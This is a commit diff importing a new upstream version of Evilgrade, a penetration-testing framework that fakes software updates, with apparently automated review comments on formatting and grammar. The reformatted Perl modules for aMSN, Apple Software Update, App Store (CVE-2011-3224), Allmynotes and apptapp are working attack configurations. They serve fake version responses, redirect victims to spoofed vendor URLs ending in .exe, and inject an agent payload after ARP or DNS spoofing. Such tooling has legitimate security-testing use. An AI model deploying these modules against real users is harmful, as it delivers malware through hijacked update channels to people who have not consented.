Commit 5d4be768 authored by Sophie Brun

Imported Upstream version 2.0.7+git20160629

parent d3ed3654
......@@ -12,11 +12,11 @@ Evilgrade is a modular framework that allows the user to take advantage of poor
It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.
Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
* When should I use evilgrade?
##### * When should I use evilgrade?
This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:
Internal scenery:
##### Internal scenery:
- Internal DNS access
- ARP spoofing
- DNS Cache Poisoning
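Review bot: the new headings keep the bullet marker inside the heading text (`##### * When should I use evilgrade?`), so they render as a heading containing a literal asterisk; drop the `* ` since `#####` already provides the structure. While these lines are being rewritten, `Internal scenery:` reads better as `Internal scenario:`, and the retained context line still has `it's own WebServer` where `its own` is meant.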
......@@ -24,19 +24,19 @@ Internal scenery:
- TCP hijacking
- Wi-Fi Access Point impersonation
External scenery:
##### External scenery:
- Internal DNS access
- DNS Cache Poisoning
* How does it work?
##### * How does it work?
Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.
* What OS are supported?
##### * What OS are supported?
ISR-Evilgrade is crossplatform, it only depends of having an appropriate payload for the right target platform to be exploited.
Implemented modules:
#### Implemented modules:
-------------------
- Freerip 3.30
- Jet photo 4.7.2
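Review bot: `#### Implemented modules:` still has the setext underline `-------------------` on the line below it; now that an ATX `####` prefix has been added, that dash line renders as a horizontal rule rather than a heading underline, so it should be deleted. The level is also `####` here but `#####` for the sibling headings above, so pick one level for these FAQ-style headings.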
......@@ -422,7 +422,7 @@ help - prints this screen, or help on 'command'
```
.:: [ADVANCED] ::.
## .:: [ADVANCED] ::.
- Modules Options:
Each module has special options, but the "agent" field is always present.
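Review bot: the ASCII decoration is carried into the markdown heading (`## .:: [ADVANCED] ::.`), and the same pattern is applied to the other section headings in this README; if the goal is a markdown-native layout, `## Advanced` (and likewise `## Module development`, `## Tips`, `## Requirements`) is cleaner and yields readable anchors in rendered views.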
......@@ -473,7 +473,7 @@ After our payload was generated, we leave a multi handler listening on the previ
[*] Starting the payload handler...
```
.:: [MODULE DEVELOPMENT] ::.
## .:: [MODULE DEVELOPMENT] ::.
Module development is very simple. Since evilgrade is based on modules, you just have to use a package .pm (perl module).
In this case we are going to describe the sunjava update module (comments with #):
......@@ -590,17 +590,42 @@ my $base=
};
```
.:: [TIPS] ::.
## .:: [TIPS] ::.
1) Don't forget to run evilgrade with an user that has privileges to create listening sockets,
otherwise you won't be able to use evilgrade's Services.
2) Everytime you modify a module with evilgrade running don't forget to 'reload' them.
3) Set the binary 'agents' before starting services because there are some fields that evilgrade
will fill out for you (agentmd5, agentsha256, and agentsize) that can't be done with them already running.
.:: [REQUIREMENTS] ::.
4) If you're using a dynamic response with variables such as: <%AGENTSIZE%>, <%AGENTMD5%>, <%URL\_FILE%>, <%URL\_FILE\_EXT%>, or custom ones defined at the options section, don't forget to set *parse* on 1.
5) Same goes for injecting an agent, you must enable de *bin* flag on 1.
6) If you want to make plaintext responses using HTTP use the *cheader* flag. Example below:
```
{ 'req' => '/sitepath/download/file.zip'
, #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
. "Location: http://sitedomain.com/<%URL_FILE%>.exe \r\n"
. "Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
7) To filter via User-Agent, use as an example the Sparkle2 module. In base add 'useragent' => 'true', and on a request use as you would use the 'req' field but for user agents in 'useragent'. Note that this field already stripped "User-Agent: ".
```
## .:: [REQUIREMENTS] ::.
# Perl Modules
### Perl Modules
```
Data::Dump
Digest::MD5
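Review bot: the code fence opened for tip 6 (the ``` after `Example below:`) is closed only after tip 7, so tip 7's prose ends up inside the code block; move the closing fence to directly after the `},` that ends the example hash. Smaller wording fixes on the added lines: `enable de *bin* flag` should read `enable the *bin* flag`, `an user` should be `a user`, `Everytime` should be `Every time`, and tip 7's last sentence is clearer as `Note that this field already has "User-Agent: " stripped.`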
......@@ -608,7 +633,7 @@ will fill out for you (agentmd5, agentsha256, and agentsize) that can't be done
RPC::XML
```
.:: [MORE INFORMATION] ::.
## .:: [MORE INFORMATION] ::.
This framework was presented in the following security conferences:
......@@ -621,7 +646,7 @@ This framework was presented in the following security conferences:
```
.:: [AUTHOR] ::.
## .:: [AUTHOR] ::.
Francisco Amato
famato+at+infobytesec+dot+com
Version 2.0.8 - 08-06-2016
--------------------------
- ASUS OEM LiveUpdate module added
- Fixed ReadLine::Gnu bug
- Improved README.md
- Added a 2 new configuration variables <%URL_FILE%> and <%URL_FILE_EXT%>
- ACER Care Center Live Update module added
- OpenBazaar module added
- Sparkle module generic exploitation added
- Extended filtering of requests via useragent too.
Version 2.0.7 - 03-06-2016
--------------------------
- (Samsung SW Update Tool 2.2.5.16) samsung module added
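Review bot: the added changelog entry is headed `Version 2.0.8 - 08-06-2016`, while this commit is described as `Imported Upstream version 2.0.7+git20160629`; either upstream has not tagged 2.0.8 yet and the packaging version should stay at 2.0.7+git, or the tag exists and the import should reference it. Also `Added a 2 new configuration variables` should be `Added 2 new configuration variables`, and `Extended filtering of requests via useragent too.` is the only entry with a trailing period.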
......@@ -50,7 +61,7 @@ Last Versions:
- Jet photo 4.7.2
*- Teamviewer 5.1.9385
- ISOpen 4.5.0
- Istat
- Istat
- Gom 2.1.25.5015
- Atube catcher 1.0.300
- Vidbox 7.5
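Review bot: the removed and re-added `- Istat` lines read identically here, so this looks like a trailing-whitespace-only change (the same applies to the `- Photoscape` and `- DIVX Suite 6.2` hunks that follow); a whitespace-ignoring diff would confirm no content changed. The stray `*` in the context line `*- Teamviewer 5.1.9385` also breaks the list marker and could be cleaned up in the same pass.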
......@@ -86,7 +97,7 @@ Last Versions:
- Flashget
- Miranda
- Orbit
- Photoscape
- Photoscape
- Panda Antirootkit
- Skype
- Sunbelt
......@@ -102,7 +113,7 @@ Last Versions:
- Paint.Net 3.5.4
- wmedia version 9
- Cygwin 1.5.25-11
- DIVX Suite 6.2 ( Player, WebPlayer, Codec Converter, DrDivX )
- DIVX Suite 6.2 ( Player, WebPlayer, Codec Converter, DrDivX )
- Opera 9.51
......@@ -27,49 +27,52 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'Allmynotes',
my $base = {
'name' => 'Allmynotes',
'version' => '1.0',
'appver' => '< 1.26',
'author' => [ 'German Rodriguez < grodriguez +[AT]+ infobytesec.com >' ],
'description' => qq{},
'vh' => '(www.vladonai.com)',
'request' => [
{
'req' => '/online_update_checker.php', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '',
'parse' => 1,
'file' => './include/allmynotes/version',
},
{
'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
'author' => ['German Rodriguez < grodriguez +[AT]+ infobytesec.com >'],
'description' => qq{},
'vh' => '(www.vladonai.com)',
'request' => [
{ 'req' => '/online_update_checker.php', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '',
'parse' => 1,
'file' => './include/allmynotes/version',
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
'version' => { 'val' => '\'7.\'.isrcore::utils::RndNum(2)',
'hidden' => 1,
'dynamic' =>1,
},
'rnd1' => { 'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' =>1,
}
}
#Options
'options' => {
'agent' =>
{ 'val' => './agent/agent.exe', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'version' => {
'val' => '\'7.\'.isrcore::utils::RndNum(2)',
'hidden' => 1,
'dynamic' => 1,
},
'rnd1' => {
'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' => 1,
}
}
};
##########################################################################
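Review bot: `'description' => qq{}` is left empty for this module; since this hunk only reformats the hash (same keys and values, perltidy-style layout), it is a cheap moment to add a one-line description of what the module emulates (the `/online_update_checker.php` version check answered from `./include/allmynotes/version`), as the other modules' `description` fields do. The `'rnd1'` option is also defined but not referenced by any request in this file; confirm the include file uses `<%RND1%>` or drop the option.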
......@@ -82,5 +85,5 @@ sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
}
1;
......@@ -27,71 +27,73 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'aMSN',
'appver' => '<= 0.98.3',
'version' => '1.0',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
'description' => qq{},
'vh' => 'www.amsn-project.net',
'request' => [
{
'req' => '/amsn_latest', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "<%VERSION%>",
'parse' => '1',
'file' => ''
},
{
'req' => '.xml', #autoupdate plugins features no implemented
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "",
'parse' => '0',
'file' => ''
},
my $base = {
'name' => 'aMSN',
'appver' => '<= 0.98.3',
'version' => '1.0',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com>'],
'description' => qq{},
'vh' => 'www.amsn-project.net',
'request' => [
{ 'req' => '/amsn_latest', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "<%VERSION%>",
'parse' => '1',
'file' => ''
},
{ 'req' => '.xml', #autoupdate plugins features no implemented
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "",
'parse' => '0',
'file' => ''
},
{ 'req' => '/$', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' =>
'<html><script>window.location="http://www.amsn-project.net/amsn<%RND1%>.exe"</script></html>',
'parse' => 1,
'file' => '',
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
{
'req' => '/$', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '<html><script>window.location="http://www.amsn-project.net/amsn<%RND1%>.exe"</script></html>',
'parse' => 1,
'file' => '',
},
{
'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
'version' => { 'val' => "'2.'.isrcore::utils::RndNum(3).'.'.isrcore::utils::RndNum(1)",
'hidden' => 1,
'dynamic' =>1,
},
'rnd1' => { 'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' =>1,
},
}
};
#Options
'options' => {
'agent' =>
{ 'val' => './agent/agent.exe', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'version' => {
'val' =>
"'2.'.isrcore::utils::RndNum(3).'.'.isrcore::utils::RndNum(1)",
'hidden' => 1,
'dynamic' => 1,
},
'rnd1' => {
'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' => 1,
},
}
};
##########################################################################
# FUNCTION new
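Review bot: the request entries mix string and numeric values for the same flags (`'bin' => ''` and `'parse' => '1'` in the first two entries versus `'bin' => 0` / `'parse' => 1` in the last two); since the reformat rewrites every one of these lines anyway, normalising them to the integer form avoids relying on Perl's string-to-number coercion. Also `'req' => '.xml'` is used as a regex, so the unescaped dot matches any character; `'\.xml$'`, in the style of the `'\.sucatalog$'` pattern in the appleupdate module, expresses the intended match.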
......@@ -25,98 +25,100 @@ package modules::appleupdate;
use strict;
use Data::Dump qw(dump);
my $base=
{
'name' => 'Apple Windows Update Software',
my $base = {
'name' => 'Apple Windows Update Software',
'version' => '1.0',
'appver' => ' < 2.1.2 (<= Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
'description' => qq{},
'vh' => '(swcatalog.apple.com|swcdn.apple.com|itunes.com|swscan.apple.com)',
'appver' =>
' < 2.1.2 (<= Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com>'],
'description' => qq{},
'vh' =>
'(swcatalog.apple.com|swcdn.apple.com|itunes.com|swscan.apple.com)',
'request' => [
{
'req' => '\.sucatalog$', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/appleupdate_catalog.xml'
},
{ 'req' => '\.sucatalog$', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/appleupdate_catalog.xml'
},
{
'req' => '061-4339.Spanish.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
{ 'req' => '061-4339.Spanish.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
# {
# 'req' => 'AppleSoftwareUpdate.exe', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './include/appleupdate/SoftwareUpdate.exe'
# },
# {
# 'req' => 'AppleSoftwareUpdate.dmg', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './agent/osx/update.dmg'
# },
# {
# 'req' => 'AppleSoftwareUpdate.exe', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './include/appleupdate/SoftwareUpdate.exe'
# },
# {
# 'req' => 'AppleSoftwareUpdate.dmg', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './agent/osx/update.dmg'
# },
{
'req' => '.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
{ 'req' => '.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
{
'req' => '/closed.html', #regex anything
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
."Location: http://swcatalog.apple.com/update<%RND%>.exe \r\n"
."Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
{
'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
{ 'req' => '/closed.html', #regex anything
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
. "Location: http://swcatalog.apple.com/update<%RND%>.exe \r\n"
. "Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
'rnd' => { 'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' =>1,},
}
};
#Options
'options' => {
'agent' =>
{ 'val' => './agent/agent.exe', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'rnd' => {
'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' => 1,
},
}
};
##########################################################################
# FUNCTION new
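Review bot: the two commented-out request entries (`AppleSoftwareUpdate.exe` and `AppleSoftwareUpdate.dmg`) are carried through the reformat as dead configuration; either delete them or add a comment explaining why they are disabled. The `'061-4339.Spanish.dist'` entry is also redundant with the broader `'.dist'` entry, since both serve the same `./include/appleupdate/061-4339.Spanish.dist`, so one of the two can go.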
......@@ -27,46 +27,48 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'appstore',
my $base = {
'name' => 'appstore',
'version' => '1.0',
'appver' => '< Mac OS X v10.6.*',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com >' ],
'description' => qq{CVE: CVE-2011-3224 Found By: Aaron Sigel and Brian Mastenbrook
The agent have a modification in Resources/scripts/updatefrontend.py to open a Chess application
look for the comment evilgrade.
The code is execute the next time the user open the help book, more information:
http://vttynotes.blogspot.com/2011/10/cve-2011-3224-mitm-to-rce-with-mac-app.html},
'vh' => '(help.apple.com)',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com >'],
'description' =>
qq{CVE: CVE-2011-3224 Found By: Aaron Sigel and Brian Mastenbrook
The agent have a modification in Resources/scripts/updatefrontend.py to open a Chess application
look for the comment evilgrade.
The code is execute the next time the user open the help book, more information:
http://vttynotes.blogspot.com/2011/10/cve-2011-3224-mitm-to-rce-with-mac-app.html},
'vh' => '(help.apple.com)',
'request' => [
{
'req' => 'helpbook-version.txt', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '324071169.795686',
'parse' => 0,
'file' => '',
},
{ 'req' => 'helpbook-version.txt', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '324071169.795686',
'parse' => 0,
'file' => '',
},
{
'req' => '.zip', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' =>1,
'string' => '',
'parse' => 0,
'file' => ''
},
{ 'req' => '.zip', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/helpbook.zip', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
}
#Options
'options' => {
'agent' =>
{ 'val' => './agent/helpbook.zip', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
}
};
##########################################################################
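Review bot: the `description` text re-emitted in this hunk keeps its grammar errors; since the lines are rewritten anyway, `The agent have a modification` should read `The agent has a modification`, `The code is execute the next time the user open the help book` should read `The code is executed the next time the user opens the help book`, and a semicolon belongs before `more information:`. The CVE-2011-3224 reference and the blog link are useful context and should stay.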
......@@ -79,5 +81,5 @@ sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
}
1;
......@@ -27,116 +27,128 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'apptapp',
'version' => '1.0',
'appver' => '< 3.11',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
my $base = {
'name' => 'apptapp',
'version' => '1.0',
'appver' => '< 3.11',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com>'],
'description' => qq{},
'vh' => '(www.apptapp.com|repository.apptapp.com)',
'request' => [
{
'req' => '/trusted.plist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "",
'parse' => '1',
'file' => './include/apptapp/trusted.plist'
},
{
'req' => '/feature', #regex friendly
'type' => 'file', #file|string|agent|install